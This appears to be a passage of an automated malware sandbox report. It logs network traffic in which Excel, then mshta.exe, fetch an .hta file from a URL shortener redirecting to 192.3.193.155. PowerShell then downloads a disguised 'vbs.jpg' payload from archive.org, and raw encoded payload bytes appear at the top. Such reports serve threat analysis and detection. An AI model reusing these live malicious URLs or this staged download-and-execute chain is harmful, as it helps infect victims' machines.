                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv
                                                      Aug 28, 2024 06:57:03.553390026 CEST1236INData Raw: 34 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67
                                                      Data Ascii: 4gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQ
                                                      Aug 28, 2024 06:57:03.553401947 CEST1236INData Raw: 6b 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74
                                                      Data Ascii: kxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmD
                                                      Aug 28, 2024 06:57:03.553415060 CEST1236INData Raw: 37 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67
                                                      Data Ascii: 7wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6Qm
                                                      Aug 28, 2024 06:57:03.553427935 CEST896INData Raw: 6b 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75
                                                      Data Ascii: kyDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnD
                                                      Aug 28, 2024 06:57:03.553440094 CEST1236INData Raw: 6b 59 44 49 32 77 68 4e 59 59 44 46 32 41 68 4e 4d 59 44 41 31 77 66 4e 34 58 44 39 31 41 66 4e 73 58 44 36 31 51 65 4e 67 58 44 33 31 67 64 4e 55 58 44 30 31 77 63 4e 49 58 44 78 31 41 63 4e 38 57 44 75 31 51 62 4e 77 57 44 72 31 67 61 4e 6b 57
                                                      Data Ascii: kYDI2whNYYDF2AhNMYDA1wfN4XD91AfNsXD61QeNgXD31gdNUXD01wcNIXDx1AcN8WDu1QbNwWDr1gaNkWDo1wZNYWDl1AZNMWDi1QYNAWDf1gXN0VDc1wWNoVDZ1AWNcVDW1QVNQVDT1gUNEVDQ1wTN4UDN1ATNsUDK1QSNgUDH1gRNUUDE1wQNIUDAAAQAsBQBQCQMsHj4xgdMOHDxxobMwGjpxwZMSGDix4XM0FjaxAWMWFD
                                                      Aug 28, 2024 06:57:03.553452015 CEST1236INData Raw: 31 41 65 4e 4f 58 44 76 31 6f 61 4e 59 57 44 56 31 41 45 4e 77 54 54 36 30 34 4b 4e 59 53 6a 5a 30 6f 46 4e 72 51 6a 48 7a 41 2b 4d 2f 4f 54 74 7a 49 36 4d 34 4e 7a 62 7a 67 32 4d 6d 4d 7a 48 79 55 75 4d 50 4c 44 75 79 45 72 4d 49 4b 44 67 79 4d
                                                      Data Ascii: 1AeNOXDv1oaNYWDV1AENwTT604KNYSjZ0oFNrQjHzA+M/OTtzI6M4Nzbzg2MmMzHyUuMPLDuyErMIKDgyMmMVJjRyYQMsDAAAgHAFAAAAAwPU/jp/k3Pn9zT/YkPJ7jA9sePe3T09QcPD2jd98WPo1TY8QOPZzzu8QJPyxzR8MxOvvD47Y9OPrj864JO4jjk3Q9NGfzs3s6NdejV3k0N1czI2srNZVDo1gZNKWTe1wWNhVTI1wA
                                                      Aug 28, 2024 06:57:03.553463936 CEST1236INData Raw: 54 53 44 6a 30 73 48 4e 78 52 7a 5a 30 41 47 4e 52 52 7a 53 30 51 45 4e 35 49 54 76 79 49 72 4d 53 46 6a 2b 78 51 66 4d 75 48 7a 32 78 30 63 4d 46 48 6a 72 78 51 61 4d 5a 47 7a 6b 78 34 59 4d 70 46 44 59 78 77 54 4d 30 41 54 39 77 30 4f 4d 73 43
                                                      Data Ascii: TSDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm/44P89Dd/g2Pg9zV/40PG9jP/YzPu8TI/UxPN4zz+MqP35DU+okPE5jP+YjPy4zJ+ghPM0z+98ePd3Tu9oaPc2je9UXPw1DX9EVP80zL9QCP1zz18INPNzj
                                                      Aug 28, 2024 06:57:03.553477049 CEST1236INData Raw: 31 34 59 4e 6a 55 54 48 31 63 52 4e 4e 51 54 75 30 55 4b 4e 66 53 54 6a 30 30 45 4e 79 51 44 49 30 38 41 4e 47 4d 44 2f 7a 51 2f 4d 69 50 6a 6d 7a 45 35 4d 2f 4e 44 65 7a 34 67 4d 39 4c 44 2b 79 77 75 4d 6e 4c 44 31 79 67 73 4d 42 4c 6a 71 79 51
                                                      Data Ascii: 14YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLAEADA/YvPf6Tg+MmPe0DN9cSPX0jC8IFPSwDA7M/OovDx7Q5OHuTb7IgOCnzH5owNNYDr2ISNYXzw1kWNWQTCzsyMIID2xcMAAAATAQAIAszY4UxN4fjp3Ak
                                                      Aug 28, 2024 06:57:03.553489923 CEST1236INData Raw: 73 79 44 71 38 51 4b 50 67 79 7a 6d 38 59 46 50 41 73 44 2f 37 67 2f 4f 30 76 7a 37 37 67 2b 4f 78 71 7a 41 35 55 66 4f 58 6e 44 78 33 77 79 4e 6f 63 44 4a 33 41 79 4e 62 59 6a 31 32 41 6f 4e 38 5a 44 65 32 51 6e 4e 76 5a 44 61 32 45 44 4e 44 53
                                                      Data Ascii: syDq8QKPgyzm8YFPAsD/7g/O0vz77g+OxqzA5UfOXnDx3wyNocDJ3AyNbYj12AoN8ZDe2QnNvZDa2EDNDSTd0cFNENDlzE1MLNzOzIhMpLzwyEqMbKTjygoMCKDfyYnMxJzayUmMfJjWyQlMOJDSyMkM9IzNyEjMsIjJyAiMaITFy8gMJIzAx4fM4Hj8xweMnHT4xsdMVHD0xocMEHjvxkbMzGTrxcaMiGDnxYZMQGzixUYM/FT
                                                      Aug 28, 2024 06:57:03.558514118 CEST1236INData Raw: 7a 4d 33 4d 73 4e 54 58 7a 63 31 4d 4b 4a 44 64 79 6f 6d 4d 67 4a 6a 56 79 77 6b 4d 47 42 41 41 42 51 42 41 44 41 45 41 2f 77 68 50 31 31 6a 32 39 6b 44 50 6d 79 7a 45 37 41 6f 4f 76 6e 44 42 34 49 50 4f 63 6a 54 70 34 63 49 4f 73 68 44 53 34 45
                                                      Data Ascii: zM3MsNTXzc1MKJDdyomMgJjVywkMGBAABQBADAEA/whP11j29kDPmyzE7AoOvnDB4IPOcjTp4cIOshDS4EDOUgDDAAAAsAwAwAwPA+za/YlP+TjNzcOAAAAFAMAIAMTEzEAAAAADAMAEA8jJ/AhP67TvAAAAQAwAAAAAAETTx4TMtEzDxAAAAAAFAIA8AAAA4kHOYhjR4cDORAAAAQBACANA0QDNHAAAAwAACAMA7M8O3uTm7Q3


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.224916388.99.66.384433528C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-28 04:56:27 UTC321OUTGET /pitash HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: zhort.de
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:56:27 UTC469INHTTP/1.1 302 Found
                                                      Server: openresty
                                                      Date: Wed, 28 Aug 2024 04:56:27 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 80
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 0
                                                      Location: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
                                                      Vary: Accept
                                                      X-Served-By: zhort.de
                                                      2024-08-28 04:56:27 UTC80INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 39 33 2e 31 35 35 2f 78 61 6d 70 70 2f 62 6f 7a 2f 62 7a 2f 49 45 6e 65 74 77 6f 72 6b 72 6f 75 6e 64 74 68 69 6e 67 73 2e 68 74 61
                                                      Data Ascii: Found. Redirecting to http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.224916588.99.66.384433776C:\Windows\System32\mshta.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-28 04:56:29 UTC345OUTGET /pitash HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: zhort.de
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:56:29 UTC469INHTTP/1.1 302 Found
                                                      Server: openresty
                                                      Date: Wed, 28 Aug 2024 04:56:29 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 80
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 0
                                                      Location: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
                                                      Vary: Accept
                                                      X-Served-By: zhort.de
                                                      2024-08-28 04:56:29 UTC80INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 39 33 2e 31 35 35 2f 78 61 6d 70 70 2f 62 6f 7a 2f 62 7a 2f 49 45 6e 65 74 77 6f 72 6b 72 6f 75 6e 64 74 68 69 6e 67 73 2e 68 74 61
                                                      Data Ascii: Found. Redirecting to http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.2249168207.241.232.1544432848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-28 04:56:42 UTC111OUTGET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                      Host: ia803104.us.archive.org
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:56:42 UTC591INHTTP/1.1 200 OK
                                                      Server: nginx/1.24.0 (Ubuntu)
                                                      Date: Wed, 28 Aug 2024 04:56:42 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 1931225
                                                      Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                      Connection: close
                                                      ETag: "66a41ab4-1d77d9"
                                                      Strict-Transport-Security: max-age=15724800
                                                      Expires: Wed, 28 Aug 2024 10:56:42 GMT
                                                      Cache-Control: max-age=21600
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                      Access-Control-Allow-Credentials: true
                                                      Accept-Ranges: bytes
                                                      2024-08-28 04:56:42 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                      2024-08-28 04:56:42 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                      Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                      2024-08-28 04:56:42 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                      Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                      2024-08-28 04:56:42 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                      Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                      2024-08-28 04:56:42 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                      Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                      2024-08-28 04:56:42 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                      Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                      2024-08-28 04:56:42 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                      Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                      2024-08-28 04:56:42 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                      Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                      2024-08-28 04:56:42 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                      Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
